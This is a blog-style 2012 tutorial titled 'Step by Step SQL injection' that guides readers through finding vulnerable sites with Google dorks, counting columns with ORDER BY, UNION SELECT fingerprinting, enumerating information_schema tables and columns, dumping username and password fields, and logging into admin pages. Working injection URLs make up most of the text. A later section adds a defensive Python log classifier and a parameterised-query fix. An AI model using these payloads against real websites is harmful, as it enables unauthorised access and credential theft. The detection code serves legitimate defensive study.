Bismilah hirahman nirahim
Special thanks to Kharasan CyberArmy and all members, thx bro, you are my inspiration!!
Step by Step SQL injection
=== [1] ===
Look for a target. To find one you can use Google dorks for SQLi.
Example: http://www.target.site/index.php?id=69
=== [2] ===
After finding the target, the next step is to check whether the target can be injected or not.
To check, add the character ' or - at the end of the URL.
Example:
http://www.target.site/index.php?id=69'
http://www.target.site/index.php?id=69-
http://www.target.site/index.php?id=-69
If an error appears such as
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/u198/domain/target.site/index.php on line 69
then the target is vulnerable and can be injected.
=== [3] ===
Find and count the number of existing tables in the database. Use the command +order+by+ or /**/order/**/by/**/
Example: http://www.target.site/index.php?id=69+order+by+1--
Now check one by one. Example:
http://www.target.site/index.php?id=69+o...r+by+2--
to
http://www.target.site/index.php?id=69+o...+by+13--
to
http://www.target.site/index.php?id=69+order+by+47--
and beyond, until an error appears or the message goes missing.
For example, if we find the error, or the message is lost, at number 13: http://www.target.site/index.php?id=69+o...+13-- that means the number we take is up to 12.
=== [4] ===
To bring out the numbers that appear on the page, use the union command. Because the last error was at number 13, use the command +and+1=2+union+select+ or /* */union/* */select/* */ or /**/UNION/**/SELECT/**/ALL/**/ then:
http://www.target.site/index.php?id=69+a...2C12--
The numbers 4, 7, 8 would then appear (these are called magic numbers).
Use the command version() to check the SQL version in use, user() to find out the name of the database user, and database() to find out the name of the database. The command is put in one of the numbers that came out earlier.
Example: http://www.target.site/index.php?id=69+a...%2C12--
Look at the version in use. If it is version 4.x.x.xx, leave it, because in version 4 we have to guess the tables and columns on the web ourselves, since the command +from+information_schema cannot be used. Version 5.x.x.xx means you don't need to guess the tables and columns as in version 4, because in version 5 the command +from+information_schema can be used.
=== [5] ===
To show all the tables, the commands are:
group_concat(table_name) -> placed in one of the numbers that came out
+from+information_schema.tables+where+table_schema=database()-- -> entered after the last number
Example: http://www.target.site/index.php?id=69+a...Ddatabase%28%29--
Look for a table with a name like user, usr, username, login, user_name, user_admin, name, etc. The username and password are usually stored in a table such as admin_user.
In this example the table is users. First convert the word users into hex using the r3m1ck converter tool. The result is 75 73 65 72 73; remove the spaces so that it becomes 7573657273.
=== [6] ===
To find the contents of the table (its columns), the commands are:
group_concat(column_name) -> placed in one of the numbers that came out
+from+information_schema.columns+where+table_name=0xhexa-- -> entered after the last number, with hexa replaced by the hex conversion of the word users
Example: http://www.target.site/index.php?id=69+a...mn_name%29,5,6,user(),database(),9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273--
The contents of the table users are then id, login, password.
=== [7] ===
See the contents of the columns id, login, password.
The commands are:
group_concat(0x3a,the columns whose contents you want to bring out) -> placed in one of the numbers that came out
+from+(the name of the table obtained)-- -> entered after the last number
Example: http://www.target.site/index.php?id=69+a...sers--
0x3a is the sign : (colon).
=== [8] ===
The last step is to look for the admin login page, if you have found a username + password that is encrypted. Please try it. Hopefully this tutorial is useful for learning. The author is not responsible for any damage that you do.
wassalamu'alaikum warrohmatULLAH
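From the defender's side, each step above leaves a recognisable request in the web server's access log. The following is an added example, not part of the original post: it normalises a request target and reports which of the tutorial's stages it matches. The names STAGES, normalise and classify, the rule set, and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Stage signatures taken from the steps in this tutorial, matched after
# normalisation. Rule names are this example's own, not a product's.
STAGES = [
    ("quote_or_dash_probe", re.compile(r"=-?\d+\s*['-]\s*(&|$)|=-\d+\s*(&|$)")),
    ("order_by_count", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("fingerprint", re.compile(r"\b(version|user|database)\s*\(\s*\)")),
    ("schema_enum", re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b")),
    ("group_concat_dump", re.compile(r"\bgroup_concat\s*\(")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b")),
]

def normalise(query: str) -> str:
    """Undo the obfuscations the tutorial relies on: URL encoding, '+' for
    spaces, and /**/ inline comments used in place of whitespace."""
    prev, text = None, query
    while prev != text:                      # decode repeatedly (double encoding)
        prev, text = text, unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower().strip()

def classify(request_target: str) -> list[str]:
    """Return the names of every stage whose signature appears in the query."""
    query = normalise(urlsplit(request_target).query)
    return [name for name, rx in STAGES if rx.search(query)]

# Constructed request targets (not real traffic): one benign, the rest follow
# the tutorial's steps against the placeholder page /index.php?id=69.
SAMPLE = [
    "/index.php?id=69",
    "/index.php?id=69%27",
    "/index.php?id=69+order+by+13--",
    "/index.php?id=69/**/UNION/**/SELECT/**/ALL/**/1,2,3,version(),5--",
    "/index.php?id=69+and+1=2+union+select+1,group_concat(table_name),3"
    "+from+information_schema.tables+where+table_schema%3Ddatabase%28%29--",
    "/index.php?id=69+and+1=2+union+select+1,group_concat(0x3a,login),3+from+users--",
]

if __name__ == "__main__":
    for target in SAMPLE:
        print(classify(target) or ["clean"], target)
```

Matches are triage signals for access-log review, not a fix. The fix for a page like this is to bind id as a query parameter (or cast it to an integer) instead of concatenating it into the SQL string.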
Saturday, 05 May 2012
SQLi Step by Step written by r3m1ck